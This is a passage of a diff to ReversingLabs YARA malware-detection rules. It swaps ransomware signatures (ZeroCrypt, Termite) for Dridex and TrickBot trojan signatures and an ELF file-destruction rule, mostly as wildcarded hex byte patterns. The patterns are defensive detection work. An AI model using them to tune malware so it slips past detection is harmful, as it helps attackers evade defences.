?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 + $destroy_files_p2 = { + 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? + ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ?? + ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ?? + ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 + ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? + ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39 + 85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? + 48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 + C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 + ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 } - $modify_processes_p2 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1 - 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F - 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5 - ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ?? - 50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? - ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? - ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8 - ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ?? - ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 - 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77 + $destroy_files_p3 = { + 89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85 + ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48 + 8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29 + D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48 + 39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 + 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 + C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 + ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 + C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 + 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 + C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? + 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? + ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3 } condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($modify_processes_p*)) + uint32(0)==0x464C457F and ( all of ($destroy_files_p*)) } -rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects ZeroCrypt ransomware." + description = "Yara rule that detects Dridex trojan." author = "ReversingLabs" - id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462" - date = "2020-07-15" - modified = "2020-07-15" + id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d" + date = "2020-09-16" + modified = "2020-09-16" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ZeroCrypt" + tc_detection_type = "Trojan" + tc_detection_name = "Dridex" tc_detection_factor = 5 importance = 25 strings: - $encrypt_file_1 = { - 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? - ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? - ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ?? - 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? - 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 - 24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? - ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 - 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B - D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 - 56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ?? - 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? - ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? - ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 - 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? - FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 + $resolve_api_wrapper_1 = { + 56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F + 5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ?? + ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9 } - $encrypt_file_2 = { - C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? - 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44 - 24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ?? - ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? - 8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A - ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 - 84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C - 24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ?? - ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? - ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 - 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? - 03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? - ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F + $resolve_api_wrapper_2 = { + 57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8 + ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84 + C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB } - $encrypt_file_3 = { - 00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ?? - 50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 - ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ?? - ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 - ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ?? - ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB - C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? - ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF - B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? - ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? - ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + $resolve_api_wrapper_3 = { + 55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 + ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? + 85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2 + } + $resolve_api_wrapper_4 = { + 55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56 + E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0 + 74 ?? 5E 89 45 ?? 5D E9 + } + $find_first_file_snippet_1 = { + 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ?? + ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ?? + 52 53 51 FF D0 + } + $find_first_file_snippet_2 = { + 57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? + ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA + 8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1 + } + $find_first_file_snippet_3 = { + 53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B + 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53 + 53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 + } + $find_first_file_snippet_4 = { + 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D + 5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A + ?? 8D 56 ?? 52 53 51 CC C3 + } + $find_first_file_snippet_5 = { + 56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50 + 50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 } condition: - uint16(0)==0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3 + uint16(0)==0x5A4D and ( any of ($resolve_api_wrapper_*) and any of ($find_first_file_snippet_*)) } -rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Termite ransomware." + description = "Yara rule that detects TrickBot trojan." author = "ReversingLabs" - id = "350011fa-1e3c-5079-8fe7-968340a3aca0" - date = "2020-08-31" - modified = "2020-08-31" + id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Termite" + tc_detection_type = "Trojan" + tc_detection_name = "TrickBot" tc_detection_factor = 5 importance = 25 strings: - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 - ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D - ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? - 58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D - ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 - C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 - 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? - B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B - 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 - } - $find_files_p2 = { - 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? - ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 - C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 - 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 - ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 - C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 - F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F - 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? - ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? - B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 